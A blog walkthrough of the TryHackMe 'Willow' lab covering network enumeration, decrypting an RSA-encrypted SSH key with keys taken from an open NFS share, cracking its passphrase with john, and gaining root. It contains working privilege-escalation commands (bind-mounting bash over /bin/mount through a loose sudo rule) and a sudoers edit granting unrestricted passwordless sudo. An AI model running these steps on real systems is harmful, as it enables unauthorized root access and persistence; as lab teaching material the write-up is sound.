Willow TryHackMe Walkthrough

Shivam Taneja
8 min read · Oct 14, 2022

TryHackMe Willow Writeup

What lies under the Willow Tree? Grab the flags from the Willow

Enumeration

Let's add willow to /etc/hosts and run rustscan, passing the service and script scan through to nmap:

╰─⠠⠵ rustscan -a willow --ulimit 10000 -- -sC -sV -oA willow -A

[~] The config file is expected to be at “/home/tony/.rustscan.toml”

[~] Automatically increasing ulimit value to 10000.

Open 10.10.30.196:22

Open 10.10.30.196:80

Open 10.10.30.196:111

Open 10.10.30.196:2049

[~] Starting Script(s)

[>] Script to be run Some(“nmap -vvv -p {{port}} {{ip}}”)

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-03 20:03 BST

NSE: Loaded 151 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:03

Completed NSE at 20:03, 0.00s elapsed

Initiating Ping Scan at 20:03

Scanning 10.10.30.196 [2 ports]

Completed Ping Scan at 20:03, 0.04s elapsed (1 total hosts)

Initiating Connect Scan at 20:03

Scanning willow (10.10.30.196) [4 ports]

Discovered open port 22/tcp on 10.10.30.196

Discovered open port 111/tcp on 10.10.30.196

Discovered open port 80/tcp on 10.10.30.196

Discovered open port 2049/tcp on 10.10.30.196

Completed Connect Scan at 20:03, 0.03s elapsed (4 total ports)

Initiating Service scan at 20:03

Scanning 4 services on willow (10.10.30.196)

Completed Service scan at 20:04, 6.09s elapsed (4 services on 1 host)

NSE: Script scanning 10.10.30.196.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 1.45s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.18s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

Nmap scan report for willow (10.10.30.196)

Host is up, received conn-refused (0.034s latency).

Scanned at 2021-04-03 20:03:55 BST for 8s

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)

| ssh-hostkey:

| 1024 43:b0:87:cd:e5:54:09:b1:c1:1e:78:65:d9:78:5e:1e (DSA)

| 2048 c2:65:91:c8:38:c9:cc:c7:f9:09:20:61:e5:54:bd:cf (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0/BxHjpZXU3EhwOMURG/xIJno/fZBBw2tntPhQMsA+L6YoVL4IyTKTz6SGM6BcX9622CGutBiO0pc0vhGlf9v/4cUB7My3d1r3t3EkNF0SaKAmAZLm8QOFbmS/TyHy9wF5TGJLunz5cN3NdGIz3Bz2GHHouicRo/vopYmHxjItfVgVUD2u+e5Gkw7u+U1BxZOrQDlaUS41AJvZm9Pk0pn2hWXeGTCJu8oyCqaEi/u8Wu7Ylp/t15NjEpiDpRp2LH9ctB3EG50LL+ti2o8/U652wIoNhnoF33eI6HJget9jvSC03oOx5r6NqHbOn94kVAUjFbYzK716dBa+I5jocHr

| 256 bf:3e:4b:3d:78:b6:79:41:f4:7d:90:63:5e:fb:2a:40 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIW2cLhyEIs7aEuL5e/SGCx5HsLX1a1GfgE/YBPGXiaFt/AkVFA3leapIvX+CD5wc7wCKGDToBgx6bkIY9vb0T0=

| 256 2c:c8:87:4a:d8:f6:4c:c3:03:8d:4c:09:22:83:66:64 (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOsXsk2l13dc4bQlT0wYP6/4gpeoTx5IfVvOBF++ClPu

80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: Recovery Page

111/tcp open rpcbind syn-ack 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100000 3,4 111/tcp6 rpcbind

| 100000 3,4 111/udp6 rpcbind

| 100003 2,3,4 2049/tcp nfs

| 100003 2,3,4 2049/tcp6 nfs

| 100003 2,3,4 2049/udp nfs

| 100003 2,3,4 2049/udp6 nfs

| 100005 1,2,3 48300/udp6 mountd

| 100005 1,2,3 51380/tcp mountd

| 100005 1,2,3 51516/udp mountd

| 100005 1,2,3 55854/tcp6 mountd

| 100021 1,3,4 37023/tcp6 nlockmgr

| 100021 1,3,4 47964/udp6 nlockmgr

| 100021 1,3,4 54419/tcp nlockmgr

| 100021 1,3,4 54556/udp nlockmgr

| 100024 1 33277/tcp6 status

| 100024 1 43108/tcp status

| 100024 1 47863/udp status

| 100024 1 58992/udp6 status

| 100227 2,3 2049/tcp nfs_acl

| 100227 2,3 2049/tcp6 nfs_acl

| 100227 2,3 2049/udp nfs_acl

|_ 100227 2,3 2049/udp6 nfs_acl

2049/tcp open nfs_acl syn-ack 2-3 (RPC #100227)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

NSE: Starting runlevel 2 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 20:04

Completed NSE at 20:04, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.25 seconds

22/ssh

No creds yet, so let's move on.

80/http

The page body is one long hex string. Decoding the hex in CyberChef gives a note followed by a run of space-separated decimal numbers:

Hey Willow, here’s your SSH Private key — you know where the decryption key is!

2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 [REDACTED]……………..

So the private key is on the page, but as ciphertext, and we still need the decryption key. One thing is already visible: the same value, 2367, appears five times in a row at the start, so whatever the scheme is, it is deterministic and repeated plaintext characters produce repeated ciphertext values. Let's run gobuster against the webserver while we move on...

╰─⠠⠵ gobuster dir -u http://willow/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,bak,zip,tar.gz,gz,php,sql,db,php

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://willow/

[+] Method: GET

[+] Threads: 10

[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.1.0

[+] Extensions: bak,gz,db,txt,html,zip,tar.gz,php,sql

[+] Timeout: 10s

===============================================================

2021/04/03 20:11:05 Starting gobuster in directory enumeration mode

===============================================================

/index.html (Status: 200) [Size: 20474]

Only index.html, so there is nothing else on the webserver.

111/rpc

rpcbind just lists the registered RPC programs; the rpcinfo output above already shows NFS (100003) on 2049 together with mountd, nlockmgr and status, so the interesting service is NFS.

2049/nfs

Let's take a look at what has been exported.

╰─⠠⠵ showmount -e willow

Export list for willow:

/var/failsafe *

Ok let’s mount it and take a look inside.

╰─⠠⠵ mkdir m

╰─⠠⠵ sudo mount willow:/var/failsafe m

╰─⠠⠵ find m -exec ls -l '{}' \;

total 4

-rw-r--r-- 1 root root 62 Jan 30 2020 rsa_keys

-rw-r--r-- 1 root root 62 Jan 30 2020 m/rsa_keys

╰─⠠⠵ cat m/rsa_keys

Public Key Pair: ([REDACTED])

Private Key Pair: ([REDACTED])

OK, so that looks like the decryption keys we need: a public pair (e, n) and a private pair (d, n). Note that the export is open to any client (the `*` in the export list) and the file is world-readable, so reading a private RSA pair off the network needed no credentials at all.

User Flag:

With the private pair from rsa_keys each number on the web page is one textbook RSA block: m = c^d mod n, evidently one character per block (which is why the five dashes at the start of the key header came out as five identical 2367 blocks). The RSA calculator at https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html does that arithmetic and gives back a PEM private key, saved here as id_willow. However, the header shows the key itself is protected by a passphrase:

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,[REDACTED]
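The same block-wise decryption in Python, as an added example that is not part of the original write-up and not the Drexel page's code. The real (e, n) and (d, n) values are redacted above, so the block uses a small constructed key pair (an assumption); with the real pair you would only swap in the numbers. It also shows why identical characters produced identical blocks, which is the leak that made the repeated 2367s visible before any key was known.

```python
# Added example, not code from the original write-up or from the Drexel RSA
# page. Textbook RSA with no padding, one character per block, which is how the
# numbers on the Willow web page decrypt. The real (e, n) / (d, n) pairs from
# rsa_keys are redacted above, so a small constructed key is used instead.
from typing import Dict, List

# Constructed toy key (assumption): small primes so the example runs instantly.
# Any n larger than 255 works for one-byte blocks; the real key is just bigger.
P, Q = 61, 53
N = P * Q                    # modulus n = 3233
E = 17                       # public exponent
PHI = (P - 1) * (Q - 1)
D = pow(E, -1, PHI)          # private exponent d = 2753 (Python 3.8+)


def parse_ciphertext(page_text: str) -> List[int]:
    """The decoded page is just whitespace-separated decimal integers."""
    return [int(tok) for tok in page_text.split()]


def encrypt_blocks(text: str, e: int = E, n: int = N) -> List[int]:
    """Textbook RSA: c = m^e mod n for each byte m, no padding, no randomness."""
    return [pow(m, e, n) for m in text.encode()]


def decrypt_blocks(blocks: List[int], d: int = D, n: int = N) -> str:
    """Inverse: m = c^d mod n; each m is one byte of the PEM file."""
    return bytes(pow(c, d, n) for c in blocks).decode()


def repeated_blocks(blocks: List[int]) -> Dict[int, int]:
    """Deterministic encryption leaks structure: equal plaintext bytes give
    equal ciphertext blocks. Returns {block: count} for every repeated value."""
    counts: Dict[int, int] = {}
    for c in blocks:
        counts[c] = counts.get(c, 0) + 1
    return {c: k for c, k in counts.items() if k > 1}


if __name__ == "__main__":
    header = "-----BEGIN RSA PRIVATE KEY-----"
    # Constructed "page": the header encrypted with the toy key, then handled
    # exactly the way the real numbers would be with the rsa_keys values.
    page = " ".join(str(c) for c in encrypt_blocks(header))
    blocks = parse_ciphertext(page)
    print(page)
    print(decrypt_blocks(blocks))
    # The dashes of the header all map to one block value, the same pattern
    # the run of 2367s at the start of the real page shows.
    print(repeated_blocks(blocks))
```

Because there is no padding, the ciphertext is a substitution table over single bytes: with enough known structure (a PEM header, base64 alphabet) the blocks could even be matched up without d. The Drexel tool just does the pow(c, d, n) step for you.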

Using ssh2john we should be able to crack the passphrase: it turns the encrypted PEM into a hash john understands, then john runs rockyou against it.

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/ssh2john.py id_willow > id.hash

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/john id.hash --wordlist=rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes

Cost 2 (iteration count) is 1 for all loaded hashes

Will run 8 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press 'q' or Ctrl-C to abort, almost any other key for status

[REDACTED] (id_willow)

Warning: Only 1 candidate left, minimum 8 needed for performance.

Session completed

john finishes almost instantly because this legacy PEM encryption derives the AES key from the passphrase with a single MD5 pass (that is what the "Cost 1 ... MD5/AES" and "iteration count is 1" lines mean); a key in the newer OpenSSH format with bcrypt rounds would cost far more per guess. Using the recovered passphrase we can now ssh to the box.

╰─⠠⠵ chmod 400 id_willow

╰─⠠⠵ ssh -i id_willow willow@willow

The authenticity of host ‘willow (10.10.30.196)’ can’t be established.

ECDSA key fingerprint is SHA256:6caf+NZ1ecyCIYr6PD09286by/SsrR4UdA9DZR/SgD4.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added ‘willow,10.10.30.196’ (ECDSA) to the list of known hosts.

Enter passphrase for key ‘id_willow’:

“O take me in your arms, love

For keen doth the wind blow

O take me in your arms, love

For bitter is my deep woe.”

-The Willow Tree, English Folksong

willow@willow-tree:~$

The user flag looks to be an image, so let's copy it back to our machine for a look.

╰─⠠⠵ scp -i id_willow willow@willow:user.jpg .

Enter passphrase for key ‘id_willow’:

user.jpg

Using tesseract we can grab the text out of the image

╰─⠠⠵ tesseract user.jpg -

THM{[REDACTED]}

Root Flag:

OK, now that we have the user flag, let's move on to privesc. Checking sudo -l we get:

willow@willow-tree:~$ sudo -l

Matching Defaults entries for willow on willow-tree:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User willow may run the following commands on willow-tree:

(ALL : ALL) NOPASSWD: /bin/mount /dev/*

The rule lets us run mount as root with any argument string that starts with /dev/. Two things make that far looser than it looks. First, sudo matches the arguments as one space-joined string with shell-style globbing, so the `*` also swallows the rest of the command line, including a second path and `-o` options. Second, /dev/shm is a world-writable tmpfs, so "something under /dev/" is no restriction on what gets mounted. The plan: bind-mount a copy of bash over /bin/mount itself (only the `bind` option does the work here), then "mount" a one-line script; sudo still sees the permitted path /bin/mount, but what actually runs is bash as root.

willow@willow-tree:~/t$ cp /bin/bash /dev/shm/

willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind

willow@willow-tree:~/t$ echo "bash" > /dev/shm/shell

willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/shell

root@willow-tree:/home/willow/t# id

uid=0(root) gid=0(root) groups=0(root)
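To see why the rule is so loose, here is an added example (not from the original write-up, and not sudo's own code) that models sudo's argument matching: sudo's match.c joins the user's arguments with single spaces and compares them to the rule's argument pattern with fnmatch(3) and no flags, so Python's fnmatchcase() reproduces the decision. The "tighter" rule is an assumed illustration, not something that exists on the box, and the command lines are constructed from the privesc above.

```python
# Added example, not code from the original write-up or from sudo itself.
# Models how sudo decides whether a command line matches a sudoers rule whose
# argument list contains a wildcard. sudo's match.c joins the user's arguments
# into one space-separated string and compares it to the rule's argument
# pattern with fnmatch(3) and no flags, so "*" also matches spaces and "/".
# Python's fnmatch.fnmatchcase() behaves the same way for these patterns.
import fnmatch
from typing import List

# The rule reported by `sudo -l` on the box.
RULE_ON_WILLOW = "/bin/mount /dev/*"
# An assumed, tighter rule for comparison; it is not on the box and is only
# meant to show what pinning the whole argument string changes.
RULE_TIGHTER = "/bin/mount /dev/xvda[0-9] /mnt"

# Constructed command lines (argv as sudo would receive them).
BIND_OVER_MOUNT = "/bin/mount /dev/shm/bash /bin/mount -o force,bind".split()
RUN_SHELL = "/bin/mount /dev/shm/shell".split()
INTENDED = "/bin/mount /dev/xvda5 /mnt".split()
INTENDED_WITH_OPT = "/bin/mount /dev/xvda5 /mnt -o bind".split()
OTHER_BINARY = "/bin/umount /dev/xvda5".split()


def sudo_allows(rule: str, argv: List[str]) -> bool:
    """True if sudoers `rule` (command path plus optional argument pattern)
    permits argv, following sudoers(5):
      - the command path must match exactly;
      - a rule with no argument part allows any arguments;
      - a rule whose argument part is "" allows no arguments at all;
      - otherwise the space-joined arguments must glob-match the pattern,
        and the glob is applied to the whole string, across spaces."""
    rule_cmd, _, rule_args = rule.partition(" ")
    if argv[0] != rule_cmd:
        return False
    user_args = " ".join(argv[1:])
    if rule_args == "":
        return True
    if rule_args == '""':
        return user_args == ""
    return fnmatch.fnmatchcase(user_args, rule_args)


if __name__ == "__main__":
    cases = [
        ("bind bash over /bin/mount", BIND_OVER_MOUNT),
        ("run the planted script", RUN_SHELL),
        ("the intended mount", INTENDED),
        ("intended mount plus -o", INTENDED_WITH_OPT),
        ("a different binary", OTHER_BINARY),
    ]
    for name, argv in cases:
        print(f"{name:28s} /dev/* -> {sudo_allows(RULE_ON_WILLOW, argv)!s:5s} "
              f"pinned -> {sudo_allows(RULE_TIGHTER, argv)}")
```

The loose rule accepts all three of the attacker's invocations; the pinned pattern still allows the one mount the rule was presumably written for and rejects the extra path and the `-o` options. Even a pinned pattern only constrains the argument string, not what is behind the device node, so for a real system the better fix is a wrapper script with no user-controlled arguments.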

OK, we are root, so let's take a look at the flag.

root@willow-tree:~# cat root.txt

This would be too easy, don’t you think? I actually gave you the root flag some time ago.

You’ve got my password now — go find your flag!

Damn, I wonder if I rooted this a different way than the author intended? Let's at least find the flag.

Looking at netstat we can see exim4 listening on 127.0.0.1:25, so there is local mail on the box:

root@willow-tree:/var/spool/exim4# netstat -anp | grep “127.0.0.1”

tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 1004/exim4

udp 0 0 127.0.0.1:701 0.0.0.0:* 525/rpc.statd

root@willow-tree:/var/spool/exim4# cd /var/log/exim4/

Jumping across to /var/mail/mail we can see a cron job has been mailing root:

From root@localhost.localdomain Wed Feb 05 22:41:13 2020

Return-path: <root@localhost.localdomain>

Envelope-to: root@localhost.localdomain

Delivery-date: Wed, 05 Feb 2020 22:41:13 +0000

Received: from root by willow-tree with local (Exim 4.84)

(envelope-from <root@localhost.localdomain>)

id 1izTM9–00008v-Jf

for root@localhost.localdomain; Wed, 05 Feb 2020 22:41:13 +0000

From: root@localhost.localdomain (Cron Daemon)

To: root@localhost.localdomain

Subject: Cron <root@willow-tree> mv /dev/xvda5 /dev/hidden_backup

MIME-Version: 1.0

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

X-Cron-Env: <SHELL=/bin/sh>

X-Cron-Env: <HOME=/root>

X-Cron-Env: <PATH=/usr/bin:/bin>

X-Cron-Env: <LOGNAME=root>

Message-Id: <E1izTM9–00008v-Jf@willow-tree>

Date: Wed, 05 Feb 2020 22:41:13 +0000

mv: cannot stat ‘/dev/xvda5’: No such file or directory

As my privesc has broken mount (bash is still bind-mounted over /bin/mount), let's edit sudoers as root with visudo and give willow unrestricted sudo so the mess can be undone from the willow account:

willow ALL=(ALL:ALL) NOPASSWD: ALL

Now let's drop back down to willow, remove the bind mount, and mount the device the cron job renamed:

willow@willow-tree:~$ sudo umount /bin/mount

willow@willow-tree:~$ sudo mount /dev/hidden_backup /mnt/

willow@willow-tree:~$ ls /mnt/

creds.txt

willow@willow-tree:~$ cat /mnt/creds.txt

root:[REDACTED]

willow:[REDACTED]

OK, so we have credentials, but we still need the flag. Looking around the file system I can't find anything that could be it. The clue again:

This would be too easy, don’t you think? I actually gave you the root flag some time ago.

Hmmm... Thinking about this cryptic clue, the only thing we were given earlier is user.jpg, so let's try steghide on it.

╰─⠠⠵ steghide extract -sf user.jpg

Enter passphrase:

steghide: could not extract any data with that passphrase!

That message on its own doesn't prove anything is embedded (steghide gives the same error for a wrong passphrase and for a file with no hidden data), but the clue says we already have what we need, so try root's password from creds.txt...

╰─⠠⠵ steghide extract -sf user.jpg

Enter passphrase:

wrote extracted data to “root.txt”.

╰─⠠⠵ cat root.txt

THM{[REDACTED]}

Finally we have root flag!

Conclusion

That was an interesting room; I think the privesc I used was different from what was expected.
